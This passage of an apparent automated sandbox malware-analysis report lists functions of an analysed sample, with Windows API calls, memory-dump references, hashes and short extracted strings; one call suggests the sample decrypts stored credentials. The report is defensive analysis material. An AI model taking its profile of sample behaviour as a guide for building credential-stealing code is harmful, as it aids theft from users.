                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID:
                                      • API String ID: 4291131564-0
                                      • Opcode ID: 43d849a1b57c3a45c40daf75268982b5d197831aa98b7d39fe06c9da55026d46
                                      • Instruction ID: 90c284c5096f0fa358a6b4414bd260392b3a7fb62d650cd75fde7c3464dd5957
                                      • Opcode Fuzzy Hash: 43d849a1b57c3a45c40daf75268982b5d197831aa98b7d39fe06c9da55026d46
                                      • Instruction Fuzzy Hash: 4111A474641309AFEB15CFA4C895FAA77B5EB89B10F208458FD159F3C0C7B2A941CB90
                                      Function 00F27BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,01D8E080,00000000,?,00F30DF8,00000000,?,00000000,00000000), ref: 00F27BF3
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F27BFA
                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,01D8E080,00000000,?,00F30DF8,00000000,?,00000000,00000000,?), ref: 00F27C0D
                                      • wsprintfA.USER32 ref: 00F27C47
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                      • String ID:
                                      • API String ID: 3317088062-0
                                      • Opcode ID: 9e033e838c2f4a8c2d1cf20bde86ac454428058f1d0fccffb61bd4db4365ebb6
                                      • Instruction ID: ca82bf8f392babf01dd44f6c90410da42a04c502e4d7efb9fb3fddac07e43c33
                                      • Opcode Fuzzy Hash: 9e033e838c2f4a8c2d1cf20bde86ac454428058f1d0fccffb61bd4db4365ebb6
                                      • Instruction Fuzzy Hash: F311E571D45229DBEB24DB94DC45FA9B7B8F700720F1003E5F519973C0C77459808B91
                                      Function 0136781D Relevance: 5.4, Strings: 3, Instructions: 1621COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: BgO$Pxww$Q=g
                                      • API String ID: 0-435434314
                                      • Opcode ID: d03f841e5a83b1da0424e8c33115b3c12fcebf84adebe41f1c250144b3b40644
                                      • Instruction ID: 93c0f4e6a57c06f9082ecf3ec6af46336be8e4fe97253e25c0c6d3ca0e773f3c
                                      • Opcode Fuzzy Hash: d03f841e5a83b1da0424e8c33115b3c12fcebf84adebe41f1c250144b3b40644
                                      • Instruction Fuzzy Hash: D5B2E6B360C2149FE3046E2DEC8567AFBE9EF94720F1A493DEAC4C3744EA3558058697
                                      Function 00F23970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoCreateInstance.COMBASE(00F2E120,00000000,00000001,00F2E110,00000000), ref: 00F239A8
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00F23A00
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharCreateInstanceMultiWide
                                      • String ID:
                                      • API String ID: 123533781-0
                                      • Opcode ID: 97820d8c063b591f27def186cfd69528c086cb5bd4775c7eecec7b6abea6d754
                                      • Instruction ID: fad5ee996651cdea3311fcaf2eebf42727e46691b3c84027833b6abc42e833ae
                                      • Opcode Fuzzy Hash: 97820d8c063b591f27def186cfd69528c086cb5bd4775c7eecec7b6abea6d754
                                      • Instruction Fuzzy Hash: 20411574A00A289FDB24DB58DC95B9BB7B5BB48702F4041D8E608EB2D0D7B5AEC5CF50
                                      Function 00F1A2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00F1A2D4
                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00F1A2F3
                                      • LocalFree.KERNEL32(?), ref: 00F1A323
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$AllocCryptDataFreeUnprotect
                                      • String ID:
                                      • API String ID: 2068576380-0
                                      • Opcode ID: d02b45e1ea6449ac393b9aec1c6b61458f6913421400efcddc227beb2eccc34c
                                      • Instruction ID: 947ae4fcbc64409030f899333645a843331126cb0b27b02b75505bec0342ba05
                                      • Opcode Fuzzy Hash: d02b45e1ea6449ac393b9aec1c6b61458f6913421400efcddc227beb2eccc34c
                                      • Instruction Fuzzy Hash: 3411E8B8A00209DFDB05DF94D884AAEB7B5FB88300F104569ED159B380D770AE50CBA1
                                      Function 0136C92F Relevance: 4.1, Strings: 2, Instructions: 1627COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: }S{v$.Nw
                                      • API String ID: 0-670828264
                                      • Opcode ID: 8707c503c45eb7ac9e53500f840a25e8862997b21d8ca53bf65788f1c159c3af
                                      • Instruction ID: 845fbc33e36ec577fbee50fe756910efb403de9a1f82fc60376c24525a74d122
                                      • Opcode Fuzzy Hash: 8707c503c45eb7ac9e53500f840a25e8862997b21d8ca53bf65788f1c159c3af
                                      • Instruction Fuzzy Hash: 33B2F8F360C200AFE304AE2DEC8567ABBE9EF94720F16893DE6C5C7744E63558418697
                                      Function 00F84BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: ?$__ZN
                                      • API String ID: 0-1427190319
                                      • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                      • Instruction ID: 75af2624db7dee932e15201a7eab910553edbd6704547e0ed718211c9f07f8a4
                                      • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                      • Instruction Fuzzy Hash: 5A723572908B118BD714DF14C8907AEB7E2BFD5720F598A1DF4959B291D370EC41EB82
                                      Function 01364303 Relevance: 2.8, Strings: 1, Instructions: 1576COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: QjE!
                                      • API String ID: 0-3604107827
                                      • Opcode ID: bd34e9079324bf6b057b845f2b86d48420c9ae02d23e4c4af0f55d5251fe992f
                                      • Instruction ID: 407a9ca3f11b070875f2c8b42dbdcc6946b4d2d2c8f291f608277374e9cfd37a
                                      • Opcode Fuzzy Hash: bd34e9079324bf6b057b845f2b86d48420c9ae02d23e4c4af0f55d5251fe992f
                                      • Instruction Fuzzy Hash: 1CB2D4F3608204AFE304AE2DEC8577ABBE9EF94720F16493DE6C4C7744E63598058697
                                      Function 00F65DB9 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: xn--
                                      • API String ID: 0-2826155999
                                      • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                      • Instruction ID: 1e0d319b0205551dbc1b0187160907d7d4b35c1a73e53496692b4aae1971ef89
                                      • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                      • Instruction Fuzzy Hash: BAA227B2D042688AEF18CF64C8603FDB7B1FF45310F1842AAD456BB281D7795E85EB51
                                      Function 0137214E Relevance: 2.2, Strings: 1, Instructions: 983COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: f3CV
                                      • API String ID: 0-1081656333
                                      • Opcode ID: b789612d73187fcbe29e99f8831155bf44c5ce8cd25cb8f190bcc5ecd9195edc
                                      • Instruction ID: 1c81860793fd7e884dbd4e9d0fd3f8a58ed0298a8999384de980eaf725cd5af2
                                      • Opcode Fuzzy Hash: b789612d73187fcbe29e99f8831155bf44c5ce8cd25cb8f190bcc5ecd9195edc
                                      • Instruction Fuzzy Hash: A36229F3A082149FD300AE2DDC8567AFBE5EF94720F1A893DEAC4D7744E63598058786
                                      Function 00F64DC8 Relevance: 1.9, APIs: 1, Instructions: 411COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv
                                      • String ID:
                                      • API String ID: 3732870572-0
                                      • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                      • Instruction ID: 6c12fe9699740c6d958bd74e72bdc193fee3433768f1dd9f344f2d5d857e04c9
                                      • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                      • Instruction Fuzzy Hash: 31E1F331A083419FC724DF28C8917AFB7E2EFC9710F554A2DE4D99B291D731A845EB82
                                      Function 00F64868 Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv
                                      • String ID:
                                      • API String ID: 3732870572-0
                                      • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
